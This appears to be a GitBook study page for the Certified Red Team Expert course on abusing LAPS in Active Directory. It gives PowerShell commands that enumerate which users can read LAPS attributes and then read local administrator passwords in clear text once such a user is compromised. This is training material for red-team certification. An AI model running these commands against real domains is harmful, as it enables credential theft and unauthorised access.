CRTE Certified Red Team Expert
HomeCertifications
  • Certified Red Team Expert (CRTE)
  • Exam Info
    • Reviews and Notes
    • Nikhil Mittal Videos
    • Course Content
  • 1️⃣Active Directory Enumeration
    • Objectives Description
  • 2️⃣Local Privilege Escalation
    • Description
  • 3️⃣Offensive .NET and PowerShell Tradecraft
    • Description
  • 4️⃣Domain Privilege Escalation
    • Description
    • LAPS
    • RBCD -
  • Lateral Movement
    • Description
  • Domain Dominance & Persistence
    • Description
    • Silver Ticket
    • Golden Ticket
    • Skeleton Key
    • Diamond Ticket
  • Cross Domain Attacks
    • ✅Description
    • 🟢Shadow Credentials
    • 🟢AD CS
  • Cross Forest Attacks
    • Description
    • 🟢Kerberoast
    • 🟢SID Abuse
    • 🟢AbusingPAM Trust
  • Defenses
    • Description
  • Detection & Detection Bypasses
    • Description
  • Deception
    • Description
Powered by GitBook
On this page

Was this helpful?

  1. Domain Privilege Escalation

LAPS

Find users who can read the passwords in clear text machines in OUs

Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}

Enumerate OUs where LAPS is in use along with users who can read the passwords in clear text

# Using Active Directory module
.\Get-LapsPermissions.ps1

# Using LAPS module (can be copied across machines)
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1
Find-AdmPwdExtendedRights -Identity OUDistinguishedName

Compromise the user which has the Rights, use the following to read clear-text password

Get-DomainObject -Identity <identity> | select - ExpandProperty ms-mcs-admpwd
Get-ADComputer -Identity <identity> -Properties ms-mcs-admpwd | select -ExpandProperty ms-mcs-admpwd
Get-AdmPwdPassword -ComputerName <computrt-name>
PreviousDescriptionNextRBCD -

Last updated 1 year ago

Was this helpful?

4️⃣